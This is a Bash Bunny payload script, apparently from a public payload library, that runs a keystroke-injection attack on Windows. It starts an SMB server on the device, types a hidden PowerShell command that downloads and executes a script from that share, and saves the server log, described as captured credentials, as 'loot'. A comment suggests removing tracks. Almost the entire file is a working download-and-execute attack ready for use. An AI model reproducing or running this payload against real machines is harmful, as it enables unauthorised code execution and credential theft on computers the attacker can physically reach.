bashbunny-payloads/payloads/library/execution/psh_DownloadExecSMB/payload.txt

#!/bin/bash
#
# Title:         Powershell Download and Execute SMB
# Author:        LowValueTarget
# Version:       1.2
# Category:      Powershell
# Target:        Windows XP SP3+ (Powershell)
# Attackmodes:   HID, RNDIS_ETHERNET
# Firmware:      >= 1.2
#
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
# Ensure psh.txt exists in payload directory  
#
# Requires Impacket is installed (python ./impacket/setup.py install)  
#
# | Attack Stage        | Description                   |
# | ------------------- | ------------------------------|
# | Stage 1             | Powershell                    |
# | Stage 2             | Delivering powershell payload |
#

ATTACKMODE RNDIS_ETHERNET HID

# SETUP
LED SETUP
REQUIRETOOL impacket # required for SMB server

GET SWITCH_POSITION
GET TARGET_HOSTNAME
GET HOST_IP

PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
# Check for psh.txt
if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
    LED FAIL
    exit 1
fi
cp -R ${PAYLOAD_DIR}/* /tmp/

LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
# Setup named logs in loot directory
mkdir -p ${LOOTDIR}
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p ${LOOTDIR}/${HOST}-$COUNT

# Log file
LOGFILE=psh_smb.log

# Start SMB Server
mkdir -p /loot
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &

# STAGE 1 - Powershell
LED STAGE1

RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
# Remove tracks in the psh payload if you wish

# STAGE 2 - Wait until payload retrieved
# Wait until payload is retrieved
LED STAGE2
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done

# CLEANUP
LED CLEANUP

# Move loot to mass storage
mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
rm /loot/${LOGFILE}
# Sync file system
sync

LED FINISH